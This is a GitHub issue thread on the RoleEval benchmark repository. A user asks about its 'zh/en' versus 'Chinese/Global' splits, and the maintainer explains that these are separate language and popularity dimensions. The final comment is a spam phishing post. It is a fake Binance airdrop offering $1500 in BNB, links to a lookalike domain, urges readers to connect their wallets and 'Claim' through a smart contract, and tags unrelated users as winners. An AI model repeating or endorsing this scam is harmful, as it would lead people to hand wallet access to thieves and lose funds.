### ISSUE TITLE
Why there are both `Chinese vs Global` and `zh vs en`?

### ISSUE THREAD

**Issue by zhimin-z** [Magnetic2014/RoleEval#3]
It confuses me why testing `global` using `zh` and `Chinese` using `en`.
What are the differences between `zh` and `en` compared with `Chinese` and `global` after all? It seems `zh` is the same as `Chinese` and `en` is the same as `global`, is that so?
![image](https://github.com/Magnetic2014/RoleEval/assets/8592144/0e57c594-32f7-43cb-a39e-91476b2718f5)
![image](https://github.com/Magnetic2014/RoleEval/assets/8592144/7dc80db3-edde-4fdd-b260-4b997d0e0964)
![image](https://github.com/Magnetic2014/RoleEval/assets/8592144/3219a253-2277-40f8-aded-089dbf206c0e)
![image](https://github.com/Magnetic2014/RoleEval/assets/8592144/67050468-9c84-4a8c-85a0-c3655636a892)

**Comment by Magnetic2014** [comment]
No, zh and en indicate languages used (en data are under review, so there is only zh data in this repo now). Chinese and Global indicate the range of popularity for different characters. So this doesn't mean that you test global using zh and Chinese using en, instead you test global and chinese using zh and en (4 combinations in total). Please check our paper for more details.

**Comment by YuriyEmpty** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @mauriceHsiao, @wzwgithubw, @mormenthan, @Joiechen, @desmondlab, @oo7ww, @demonran
